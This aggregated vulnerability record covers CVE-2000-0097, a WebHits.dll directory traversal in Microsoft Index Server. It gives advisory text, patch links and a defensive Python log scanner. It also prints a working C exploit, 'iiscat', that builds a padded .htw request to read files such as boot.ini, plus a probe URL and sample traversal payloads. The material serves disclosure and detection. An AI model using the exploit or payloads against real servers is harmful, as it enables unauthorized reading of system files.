CVE-2000-0097
CVSS5.0
Published: 2000-01-26 00:00:00
Revised: 2008-09-10 15:02:54
NMCOE    

[Original] The WebHits ISAPI filter in Microsoft Index Server allows remote attackers to read arbitrary files, aka the "Malformed Hit-Highlighting Argument" vulnerability.


[CNNVD] Microsoft Windows Index Server Remote Directory Traversal Vulnerability (MS00-006) (CNNVD-200001-056)

Microsoft Index Server is a web-based search engine included in the Windows NT 4.0 Option Pack; on Windows 2000 it is installed as a service.
An ISAPI application shipped with Internet Information Server 4.0, webhits.dll, contains a vulnerability that allows an attacker to escape the web server's virtual file system and gain unauthorized access to other files on the same logical drive (user databases, log files, or any other file whose path and file name can be guessed).
The webhits.dll dynamic link library is mapped to the .htw file type, but the problem exists even if no .htw file is present on the system. To check whether a system is affected, request http://your_web_server_address/nosuchfile.htw; if the response contains a message such as "format of the QUERY_STRING is invalid", the system is vulnerable.

- CVSS (Base Score)

CVSS Score: 5 [MEDIUM]
Confidentiality Impact: PARTIAL [information disclosure is likely]
Integrity Impact: NONE [no impact on system integrity]
Availability Impact: NONE [no impact on system availability]
Attack Complexity: LOW [no access restrictions on exploitation]
Attack Vector: [--]
Authentication: NONE [no authentication required for exploitation]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0097
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0097
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200001-056
(Official data source) CNNVD

- Other Links and Resources

http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
(UNKNOWN)  MS  MS00-006
http://www.securityfocus.com/bid/950
(UNKNOWN)  BID  950
http://www.osvdb.org/1210
(UNKNOWN)  OSVDB  1210

- Vulnerability Information

Microsoft Windows Index Server Remote Directory Traversal Vulnerability (MS00-006)
Medium severity; Input validation
2000-01-26 00:00:00 2005-10-12 00:00:00
Remote / Local

- Advisories and Patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
* Use Internet Server Manager to remove the mapping between webhits.dll and .htw files.

Vendor patches:
Microsoft
---------
Microsoft has released a security bulletin (MS00-006) and corresponding patches for this issue:
MS00-006: Patch Available for "Malformed Hit-Highlighting Argument" Vulnerability
Link:
http://www.microsoft.com/technet/security/bulletin/MS00-006.asp

Patch downloads:
Index Server 2.0:
- Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17727

- Alpha:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17728

Indexing Services for Windows 2000:
- Intel:
http://www.microsoft.com/downloads/release.asp?ReleaseID=17726

- Vulnerability Information (19731)

Microsoft Index Server 2.0/Indexing Services for Windows 2000 Directory Traversal (EDBID:19731)
windows remote
2000-01-26 Verified
0 fredrik.widlund
N/A
source: http://www.securityfocus.com/bid/950/info

Index Server 2.0 is a utility included in the NT 4.0 Option Pack. The functionality provided by Index Service has been built into Windows 2000 as Indexing Services.

When combined with IIS, Index Server and Indexing Services include the ability to view web search results in their original context. It will generate an html page showing the query terms in a short excerpt of the surrounding text for each page returned, along with a link to that page. This is known as "Hit Highlighting". To do this, it supports the .htw filetype which is handled by the webhits.dll ISAPI application. This dll will allow the use of the '../' directory traversal string in the selection of a template file. This will allow for remote, unauthenticated viewing of any file on the system whose location is known by the attacker.

The original patch released for this issue still discloses 'include' file types. 'include' files contain various data which assist in the execution of program files.

/* 
   fredrik.widlund@defcom-sec.com 
   
   example: iiscat ../../../../boot.ini
 */

#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>

int main(int argc, char **argv)
{
  char request[2048], *request_p, *file_read, *file_valid = "/default.htm";
  int file_buf_size = 250;

  /* file_to_read goes into CiWebHitsFile (at most 1023 bytes);
     valid_file is an existing file under the web root and must fit
     in the 250-byte padded name, or the padding loop below underflows */
  if (!((argc == 2 && argv[1] && strlen(argv[1]) < 1024) ||
        (argc == 3 && argv[1] && argv[2] && strlen(argv[1]) < 1024 && strlen(argv[2]) <= file_buf_size)))
    {
      fprintf(stderr, "usage: iiscat file_to_read [valid_file]\n");
      exit(1);
    }

  file_read = argv[1];
  if (argc == 3)
    file_valid = argv[2];

  sprintf(request, "GET %s", file_valid);
  request_p = request + strlen(request);

  /* pad the existing file name with "%20" until name plus padding is
     250 characters, then append ".htw" so the request is routed to webhits.dll */
  file_buf_size -= strlen(file_valid);
  while(file_buf_size)
    {
      strcpy(request_p, "%20");
      request_p += 3;
      file_buf_size--;
    }

  /* the finished request is printed to stdout for piping to the web server */
  sprintf(request_p, ".htw?CiWebHitsFile=%s&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n", file_read);
  puts(request);

  exit(0);
}

- Vulnerability Information

1210
Microsoft IIS WebHits.dll ISAPI Filter Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- Vulnerability Description

Microsoft IIS contains a flaw that allows a remote attacker to access arbitrary files outside of the web path. The issue is due to the webhits.dll library not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the "CiWebHitsFile" variable. By supplying a crafted request to an htw script, it is possible to read arbitrary files on the system.
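As an added defensive example (written for this page, not part of this record or of the exploit author's code), the following Python script scans IIS W3C extended log lines for .htw requests whose CiWebHitsFile parameter carries a traversal sequence, which is the pattern the description above identifies, and also flags bare .htw requests with no query string, matching the nosuchfile.htw probe noted earlier. The log field layout, the sample lines and the double URL-decoding step are assumptions; the traversal check also covers backslashes and absolute drive paths, which goes beyond the "../../" case in the text.

```python
import re
from urllib.parse import unquote, parse_qs

# Constructed sample log (not from the original page). Assumed IIS W3C layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-01-27 10:00:01 192.0.2.10 GET /default.htm - 200
2000-01-27 10:00:02 192.0.2.10 GET /search/query.htw CiWebHitsFile=/samples/readme.txt&CiRestriction=none&CiHiliteType=Full 200
2000-01-27 10:00:03 198.51.100.7 GET /default.htm%20%20%20.htw CiWebHitsFile=../../../../boot.ini&CiRestriction=none&CiHiliteType=Full 200
2000-01-27 10:00:04 198.51.100.7 GET /nosuchfile.htw - 200
2000-01-27 10:00:05 203.0.113.5 GET /x.HTW CiWebHitsFile=%2e%2e%2f%2e%2e%2fboot.ini&CiRestriction=none 200
"""

# A ".." path segment delimited by "/" or "\" (or at either end of the string).
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Absolute Windows path such as C:\ or a UNC path (\\server\share).
ABSOLUTE = re.compile(r"^([A-Za-z]:|\\\\)")


def decode_twice(value: str) -> str:
    """URL-decode twice: assumption that a second pass catches double-encoded
    sequences such as %252e%252e which a single decode would leave intact."""
    return unquote(unquote(value))


def is_htw_request(stem: str) -> bool:
    """True when the decoded URI stem ends in .htw (any case). Trailing spaces
    are stripped so the %20-padded form still matches."""
    return decode_twice(stem).strip().lower().endswith(".htw")


def traversal_in_webhits_file(query: str):
    """Return the offending CiWebHitsFile value if it contains a traversal
    sequence or an absolute path, otherwise None."""
    if query in ("", "-"):
        return None
    for key, values in parse_qs(query, keep_blank_values=True).items():
        if key.lower() != "ciwebhitsfile":
            continue
        for value in values:  # parse_qs already decoded once
            path = decode_twice(value)
            if TRAVERSAL.search(path) or ABSOLUTE.match(path):
                return path
    return None


def parse_line(line: str):
    """Split one W3C log line into a dict; skips directives and short lines."""
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    date, time, c_ip, method, stem, query, status = parts[:7]
    return {"date": date, "time": time, "c_ip": c_ip, "method": method,
            "stem": stem, "query": query, "status": status}


def scan(log_text: str):
    """Return (client_ip, kind, detail) tuples for suspicious .htw requests.
    kind is "traversal" for a CiWebHitsFile escape and "probe" for an .htw
    request with no query string (a weak signal; treat as an assumption)."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_htw_request(rec["stem"]):
            continue
        path = traversal_in_webhits_file(rec["query"])
        if path is not None:
            alerts.append((rec["c_ip"], "traversal", path))
        elif rec["query"] == "-":
            alerts.append((rec["c_ip"], "probe", rec["stem"]))
    return alerts


if __name__ == "__main__":
    for ip, kind, detail in scan(SAMPLE_LOG):
        print(f"{ip:15} {kind:9} {detail}")
```

Run against a real log, the `scan` function takes the file contents as one string; the normal hit-highlighting request on the second sample line produces no alert, while the padded stem, the bare probe and the percent-encoded traversal each produce one.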

- Timeline

2000-01-27 Unknown
2000-01-27 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- Related References

- Vulnerability Author
